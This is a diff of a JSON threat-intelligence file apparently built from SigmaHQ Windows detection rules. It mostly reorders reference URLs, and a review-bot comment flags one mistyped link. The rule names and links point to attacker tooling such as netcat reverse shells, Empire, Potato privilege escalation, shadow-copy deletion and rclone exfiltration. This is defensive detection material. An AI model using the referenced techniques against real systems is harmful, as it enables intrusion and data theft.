 "https://blog.talosintelligence.com/2017/05/wannacry.html",
 "https://redcanary.com/blog/intelligence-insights-october-2021/",
+ "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100",
 "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/",
+ "https://github.com/Neo23x0/Raccine#the-process",
+ "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/",
+ "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml"
 ],
 "tags": [
@@ -42257,9 +42281,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
 "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
- "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml"
 ],
 "tags": [
@@ -42283,8 +42307,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
 "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
 "https://isc.sans.edu/diary/22264",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"
 ],
@@ -42328,8 +42352,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_data_compressed_with_rar.yml"
 ],
 "tags": [
@@ -42362,8 +42386,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/S3cur3Th1sSh1t/SharpImpersonation",
 "https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/",
+ "https://github.com/S3cur3Th1sSh1t/SharpImpersonation",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_impersonation_tool.yml"
 ],
 "tags": [
@@ -42495,11 +42519,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/JohnLaTwC/status/1223292479270600706",
- "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md",
- "https://twitter.com/bohops/status/980659399495741441",
 "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md",
+ "https://twitter.com/JohnLaTwC/status/1223292479270600706",
+ "https://twitter.com/bohops/status/980659399495741441",
+ "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_manage_bde_lolbas.yml"
 ],
 "tags": [
@@ -42599,9 +42623,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://twitter.com/bryon_/status/975835709587075072",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/",
 "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15",
- "https://twitter.com/bryon_/status/975835709587075072",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqlps_bin.yml"
 ],
 "tags": [
@@ -42801,8 +42825,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files",
 "https://github.com/cube0x0",
+ "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml"
 ],
 "tags": "No established tags"
@@ -42823,8 +42847,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
 "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20",
+ "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml"
 ],
 "tags": [
@@ -42858,9 +42882,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/",
- "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/",
 "https://twitter.com/Z3Jpa29z/status/1317545798981324801",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/",
+ "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csi.yml"
 ],
 "tags": [
@@ -42963,8 +42987,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
 "https://www.scythe.io/library/threat-emulation-qakbot",
+ "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_not_from_c_drive.yml"
 ],
 "tags": [
@@ -43031,8 +43055,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.nirsoft.net/utils/nircmd.html",
- "https://www.nirsoft.net/utils/nircmd2.html#using",
 "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
+ "https://www.nirsoft.net/utils/nircmd2.html#using",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml"
 ],
 "tags": [
@@ -43099,8 +43123,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hostname.yml"
 ],
 "tags": [
@@ -43124,10 +43148,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/",
- "https://github.com/hfiref0x/UACME",
 "https://twitter.com/hFireF0X/status/897640081053364225",
 "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
+ "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/",
+ "https://github.com/hfiref0x/UACME",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml"
 ],
 "tags": [
@@ -43298,9 +43322,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/cyb3rops/status/1186631731543236608",
- "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
 "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/",
+ "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
+ "https://twitter.com/cyb3rops/status/1186631731543236608",
 "https://github.com/Neo23x0/DLLRunner",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml"
 ],
@@ -43435,9 +43459,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://twitter.com/_st0pp3r_/status/1583914515996897281",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
- "https://twitter.com/_st0pp3r_/status/1583914515996897281",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml"
 ],
 "tags": [
@@ -43579,8 +43603,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remove_windows_defender_definition_files.yml"
 ],
 "tags": [
@@ -43670,8 +43694,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system",
 "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps",
+ "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system",
 "https://learn.microsoft.com/en-us/windows/wsl/install-on-server",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windowsoptionalfeature.yml"
 ],
@@ -43876,8 +43900,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08",
 "https://redcanary.com/blog/child-processes/",
+ "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml"
 ],
 "tags": [
@@ -43901,10 +43925,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)",
- "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html",
- "https://lolbas-project.github.io/lolbas/Binaries/Setres/",
 "https://twitter.com/0gtweet/status/1583356502340870144",
+ "https://lolbas-project.github.io/lolbas/Binaries/Setres/",
+ "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml"
 ],
 "tags": [
@@ -43945,11 +43969,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html",
 "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone",
- "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/",
 "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a",
 "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware",
+ "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html",
+ "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rclone_execution.yml"
 ],
 "tags": [
@@ -43982,9 +44006,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/vxunderground/status/1423336151860002816?s=20",
- "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/",
 "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
+ "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/",
+ "https://twitter.com/vxunderground/status/1423336151860002816?s=20",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml"
 ],
 "tags": [
@@ -44017,9 +44041,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html",
 "https://twitter.com/haroonmeer/status/939099379834658817",
 "https://twitter.com/c_APT_ure/status/939475433711722497",
+ "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml"
 ],
 "tags": [
@@ -44380,8 +44404,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/mrd0x/status/1475085452784844803?s=12",
 "https://twitter.com/an0n_r0/status/1474698356635193346?s=12",
+ "https://twitter.com/mrd0x/status/1475085452784844803?s=12",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml"
 ],
 "tags": "No established tags"
@@ -44509,8 +44533,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.echotrail.io/insights/search/defaultpack.exe",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/",
+ "https://www.echotrail.io/insights/search/defaultpack.exe",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml"
 ],
 "tags": [
@@ -44545,8 +44569,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/",
 "https://twitter.com/gN3mes1s/status/1206874118282448897",
+ "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/",
 "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
 "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml"
@@ -44614,8 +44638,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
 "https://github.com/Kevin-Robertson/Inveigh",
+ "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml"
 ],
 "tags": [
@@ -44648,8 +44672,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)",
 "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium.yml"
 ],
 "tags": [
@@ -44758,8 +44782,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_outlook_shell.yml" ], "tags": [ @@ -44951,11 +44975,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", - "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", - "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", - "https://twitter.com/egre55/status/1087685529016193025", "https://twitter.com/JohnLaTwC/status/835149808817991680", + "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", + "https://twitter.com/egre55/status/1087685529016193025", + "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml" ], "tags": [ @@ -45266,8 +45290,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" 
@@ -45387,8 +45411,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" ], @@ -45447,8 +45471,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", + "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" ], "tags": [ @@ -45481,8 +45505,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml" 
@@ -45561,10 +45585,10 @@ "logsource.product": "windows", "refs": [ "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", - "https://github.com/ohpe/juicy-potato", - "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", - "https://pentestlab.blog/2017/04/13/hot-potato/", "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "https://pentestlab.blog/2017/04/13/hot-potato/", + "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", + "https://github.com/ohpe/juicy-potato", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml" ], "tags": [ @@ -45632,8 +45656,8 @@ "logsource.product": "windows", "refs": [ "https://nmap.org/ncat/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://www.revshells.com/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netcat_execution.yml" ], "tags": [ 
@@ -45727,8 +45751,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml" @@ -45763,8 +45787,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://hashcat.net/wiki/doku.php?id=hashcat", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat", + "https://hashcat.net/wiki/doku.php?id=hashcat", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hashcat.yml" ], "tags": [ 
@@ -45826,9 +45850,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://twitter.com/frack113/status/1555830623633375232", - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml" ], "tags": [ @@ -45927,8 +45951,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml" ], @@ -46097,11 +46121,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", "https://twitter.com/Hexacorn/status/885553465417756673", - "https://twitter.com/vysecurity/status/885545634958385153", - "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", "https://twitter.com/Hexacorn/status/885570278637678592", + "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "https://twitter.com/vysecurity/status/885545634958385153", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_escape.yml" ], "tags": [ 
@@ -46191,9 +46215,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", "https://processhacker.sourceforge.io/", "https://github.com/winsiderss/systeminformer", + "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml" ], "tags": "No established tags" @@ -46214,8 +46238,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml" ], "tags": [ @@ -46385,8 +46409,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_adwind.yml" ], "tags": [ 
@@ -46461,8 +46485,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/06/21/snatch-ransomware/", "https://github.com/yosqueoy/ditsnap", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml" ], "tags": [ @@ -46495,8 +46519,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", + "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml" ], "tags": [ @@ -46529,8 +46553,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ss64.com/nt/for.html", "https://ss64.com/ps/foreach-object.htmll", + "https://ss64.com/nt/for.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_scan_loop.yml" ], 
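Review bot: The `proc_creation_win_network_scan_loop` refs entry `https://ss64.com/ps/foreach-object.htmll` has a doubled `l` and will not resolve; it is a context line, so the defect predates this commit, but it lands in the new file. The intended target is presumably `https://ss64.com/ps/foreach-object.html` — confirm against the upstream Sigma rule's `references` and correct it there, since a hand edit to this JSON is likely to be overwritten on the next regeneration. The enclosing cluster object starts and ends outside the hunk.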
@@ -46587,8 +46611,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg", + "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml" ], "tags": [ @@ -46662,8 +46686,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/dsnezhkov/TruffleSnout", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", + "https://github.com/dsnezhkov/TruffleSnout", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trufflesnout.yml" ], "tags": [ @@ -46775,8 +46799,8 @@ "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", - "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", "https://redcanary.com/threat-detection-report/threats/qbot/", + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" ], "tags": [ 
